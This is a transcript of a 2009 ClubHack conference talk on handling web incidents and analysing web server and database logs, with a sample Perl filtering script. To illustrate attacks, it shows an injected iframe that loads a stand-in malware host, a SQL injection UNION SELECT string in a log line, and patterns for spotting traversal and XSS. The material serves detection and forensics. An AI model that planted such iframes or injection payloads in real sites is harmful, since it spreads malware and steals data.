Manindra kishore _incident_handling_n_log_analysis - ClubHack2009

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore

Web Incidents - Overview
A Glimpse of popular web based incidents
Discussion of a sample incident
Approach to Incident Analysis

A glimpse of few popular incidents
SQL injection
XSS
CSRF
Broken authentication
Broken authorization
File inclusion
Password brute force
Directory traversal
Malicious file upload
Network enumeration
…………… .

A few Attack Objectives
Force connection to malware infected remote site
Trick user into connecting to phishing site
Steal data from backend database
Obtain sensitive information from other internal machines
A common attack vector --- SQL Injection

A sample incident: Malware Download / Visit Phishing sites
SQL Injection to change values in the backend DB
Values changed to known malware distributing sites
Each time page loads - Malware downloaded
Multiple systems under attacker control

Web site distributes malware http://bank.com/homepage.jsp Exploits and Adds iframe Tag <iframe src =“http://malware.com/malware"> </iframe> in page http://bank.com/homepage.jsp Infected page Access request http://bank.com/homepage.jsp Infected page served to user Accesses http:// bank.com/homepage.jsp and finds out vulnerabilities Home Page gets infected Connection made to external site and malware gets downloaded in background User <html> <body> . . . . <iframe src =“http://malware.com/malware"> </iframe> . . </body> </html> UserID & Pswd

Incident occurred !!! What to do now?

A sample victimized 2 tier network
The web server on intranet got hacked.
I don’t know what else got hacked.
I want Incident Analysis.

Acting ahead…
Enumerate all entry points of network
Identify the components associated with victimized component in network traffic
Obtain logs of all associated components
Perform Log Analysis
This presentation focuses primarily on the attacks over the internet.
Analysis of Intranet based attacks involve more or less the same steps not on the key focus here.

Candidates for Log Analysis (in this case)
Cisco Internet Router
Cisco PIX Internet Firewall:
Juniper Intranet Firewall
Cisco L3 switch connecting all other servers
IIS 6.0 Web Server
Tomcat Application Server
Microsoft SQL Server Database

Grounds for forensics: Log Analysis

A re-look at the attacks traceable by logs
A glimpse of major attacks for which forensics can be done by different sets of logs:
SQL Injection
XSS
SSI Injection
Directory Traversal Attack
PHP Remote File Inclusion Attack
Upload Malicious Files
Re-direction Attack
Unwanted Apps/Directories open to Internet
Misusing link for activation/authentication
Brute Forcing
Enumerating Data based on error messages/app features
Session Hijack
Deep URL
Change Password
Automated Attacks
Response Splitting Attack
Arbitrary HTTP methods allowed

Mapping Attack patterns to Logs OS Logs Physical access to the server and copying data on removable media Network Device Logs (Firewall + Switch) Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server Web Logs/OS Logs/Database Logs File upload of malicious file Individual Network Service Logs Identification of all other network services and check if any other way in Application Logs/Database Logs Vulnerability inside the application which allows DB backup/restore Web Logs/OS Logs/Database Logs Upload an executable which will take a backup of the database and dump it out OS Logs Brute forcing SAM file , RDP in and stealing database Web Logs Files available on the website found through directory browsing Database Logs/OS Logs Direct connection to the Database and retrieve data FTP Logs Anonymous FTP / brute force passwords and steal backup stored Web Logs/Database Logs PHP Code Injection to retrieve database password Web Logs/Source Code PHP Local and Remote File inclusion to obtain source code and passwords Web Logs/Database Logs/Database Backup Persistent XSS on website Web Logs/Database Logs SQL Injection in the application injecting Iframe into database Web Logs/Database Logs SQL Injection in the application retrieving data

Choosing the right Log for analysis
Different device logs help in forensics of different attack patterns
Focusing on Internet based attacks, the major components for analysis are
Web Server
Database Server

Individual Analysis of elements
The components under discussion
Web Servers
IIS
Apache
Database Servers
MySQL
MSSQL

Web Server – Log Analysis – Step 1
Web Server Logs are huge
Filter the relevant logs for analysis – Script based approach
Eliminate all requests for non-existing files on webserver
Obtain the list of all valid files from webpage source code
Obtain all requests from the webserver with 200_OK response
Do the matching, filter only relevant requests, eliminate the rest.

Example –
In a banking website we see a request for 3Dgames.php in the Apache log – its obviously not valid.
This can be confirmed by looking inside the source code directory and checking if there indeed was a file called 3Dgames.php.
If not then we don't need to waste time analyzing those requests.
A little bit of Basic Perl can help here.

A sample Perl Script
A sample script for finding out valid PHP pages - Can be modified for other types as well.
SCRIPT
#!/usr/bin/perl
open(PAGE , "<page_list") or die "Cannot open file:$!";
@all_pages = <PAGE>;
close(PAGE);
open(ALLPHP , "<gateway_only200_OK") or die "Cannot open file:$!";
@all_php_requests = <ALLPHP>;
close(ALLPHP);
open(VALIDPHP , ">all_valid_php") or die "Cannot open file:$!";
for ($j=0; $j<=$#all_pages; $j++){
chomp($all_pages[$j]);
@ddd = grep(/$all_pages[$j]/ , @all_php_requests);
print VALIDPHP @ddd;
}
close(VALIDPHP);

Identifying Valid Variables – In Remaining requests
List all the valid variables from page source code – Script based approach
Compare all the requests for presence of all valid variables
If any invalid variable found in a request, eliminate the request
Eventually, filter out all requests with all valid variables

A sample Perl Script output
204.9.126.178 - -
[05/Aug/2009:11:31:54 -0500]
"GET /category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA%2C+&catid=search&searchgo.x=17&searchgo.y=12 HTTP/1.1"
--------------------
The variables here are - q, catid, searchgo.x and searchgo.y
The requested page is - category.php
Now look at the list of valid variable from source code of page – category.php (script based approach)
Figure out if the variables in request figure out here
If not, then its not a valid request and can be eliminated
Repeat the process for all requests (Script based approach as a whole)
Eventually, filter out all request with valid variables

Identify specific attack patterns - using a Log Parsing tool
Example:
While trying to detect a directory traversal attack one needs to parse the logs for the ‘../../’ pattern among others.
Sample queries to carry out parsing process:

The Demos
SQL Injection
Cross Site Scripting (XSS) – Persistent
Directory Traversal
PHP remote file inclusion
URL Redirection
Automated / Brute Force attacks
Password cracking
Automated registrations
Session prediction
Directory brute forcing

DB Server – Log Analysis
Attacks that can be detected by looking at the logs of a DB Server
SQL Injection
XSS
Brute Forcing the DB Server

Log Analysis – MySQL DB Server
SQL Injection
Obtain the Query Logs. They are generally available in ‘/mysql/data/’
Do a Code Review of the application and list down all the SQL queries from all pages on the application.
Match all the Queries in the Query Log with those obtained from code review. All queries which match are valid queries. The rest are invalid queries. Store all these invalid queries in a separate file as these are most probably the queries that an attacker used for SQL Injection.

Sample Grep Queries
Sample Grep queries to perform the action:

Cross Site Scripting (XSS) : Persistent
Parse the database for any instance of XSS. This can be done by pattern matching.
Note down all the XSS strings found in the DB
Check the DB Query Log for instances of the string noted down. This can be done using the grep command.

Exact elements for monitoring
Search for all these elements as follows:
href, coords <area> code, codebase, archive <applet> longdesc, src, usemap <img> src <script> archive, classid, codebase, data usemap <object> src, pluginspage, pluginurl, href <embed> src, url <iframe> href <a>

More Attack Patterns
Brute Forcing the DB Server
Go through the Error Logs in order to see if there are repeated failed attempts in limited time duration.

What do we achieve…?
Advantages of doing Log Analysis this way
What have we not covered here and hope to cover in the future?

Thank You. Manindra Kishore Information Security Analyst / Consultant [email_address] Questions welcomed…

http://clubhack.com	24
http://www.clubhack.com	7
http://clubhack.in	1

Manindra kishore _incident_handling_n_log_analysis - ClubHack2009

by ClubHack

Accessibility

Categories

Upload Details

Usage Rights

3 Embeds 32

Statistics

Manindra kishore _incident_handling_n_log_analysis - ClubHack2009 Presentation Transcript